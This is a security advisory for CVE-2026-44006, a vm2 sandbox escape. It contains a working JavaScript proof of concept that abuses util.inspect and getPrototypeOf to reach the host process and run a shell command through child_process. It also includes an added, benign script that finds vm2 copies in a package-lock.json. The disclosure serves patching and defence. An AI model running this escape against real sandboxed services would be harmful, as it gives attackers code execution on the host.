CVE-2026-44006 - vm2 has a Sandbox Escape Vulnerability

📡 GitHub-Advisory · 2026-05-07

GHSA-qcp4-v2jj-fjx8 CRITICAL npm/vm2

Summary

Sandboxed code can reach BaseHandler.getPrototypeOf, which can be used to obtain arbitrary prototypes.

Details

https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658

BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8).

PoC

let obj = {
	subarray: Buffer.prototype.inspect,
	slice: Buffer.prototype.slice,
	hexSlice: () => '',
};

let sym;

obj.slice(10, {
	showHidden: true,
	showProxy: true,
	depth: 10,
	stylize(a) {
		const handler = this.seen && this.seen[1];

		if (handler && handler.getPrototypeOf) {
			gP = handler.getPrototypeOf;
			HObjectProto = gP(gP(gP(gP(Buffer))));
			HObject = HObjectProto.constructor;
			sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
		}
		return a;
	},
});

obj = {
	[sym]: (depth, opt, inspect) => {
		inspect.constructor('return process')()
		.getBuiltinModule('child_process')
		.execSync('id', { stdio: 'inherit' });
	},
	valueOf: undefined,
	constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

Impact

Sandbox Escape -> RCE
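
To check whether a project pulls in the affected npm package, directly or transitively, the following added example (not part of the advisory or of vm2) lists every vm2 copy recorded in a parsed package-lock.json. The lockfile contents and version strings are constructed, and the advisory text above gives no affected version range, so each hit still has to be compared against GHSA-qcp4-v2jj-fjx8.

```javascript
// Added example: list every copy of vm2 recorded in a parsed package-lock.json.
const TARGET = 'vm2'; // package named in the advisory (npm/vm2)

function findPackage(lock, name = TARGET) {
  const hits = [];
  const add = (path, meta) =>
    hits.push({ path, version: meta.version || null, dev: Boolean(meta.dev) });

  if (lock.packages) {
    // lockfileVersion 2 and 3: flat map keyed by install path, so a nested
    // copy appears as "node_modules/<parent>/node_modules/vm2".
    for (const [path, meta] of Object.entries(lock.packages)) {
      const byPath = path === `node_modules/${name}` ||
        path.endsWith(`/node_modules/${name}`);
      // An aliased install keeps the real package name in meta.name.
      if (byPath || (path !== '' && meta.name === name)) add(path, meta);
    }
    return hits;
  }

  // lockfileVersion 1: nested "dependencies" trees.
  const walk = (deps, prefix) => {
    for (const [dep, meta] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${dep}`;
      if (dep === name) add(path, meta);
      walk(meta.dependencies, `${path}/`);
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

// Constructed lockfile; package names and versions are placeholders.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/vm2': { version: '0.0.0-sample-a' },
    'node_modules/rule-runner': { version: '2.1.0' },
    'node_modules/rule-runner/node_modules/vm2': { version: '0.0.0-sample-b' },
    'node_modules/sandbox-alias': { name: 'vm2', version: '0.0.0-sample-c', dev: true },
    'node_modules/@acme/vm2': { version: '1.0.0' },
  },
};

for (const hit of findPackage(SAMPLE_LOCK)) {
  console.log(`${hit.path}\t${hit.version}${hit.dev ? '\t(dev)' : ''}`);
}
```

For a real project, pass the result of `JSON.parse` on the contents of package-lock.json as `lock`.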

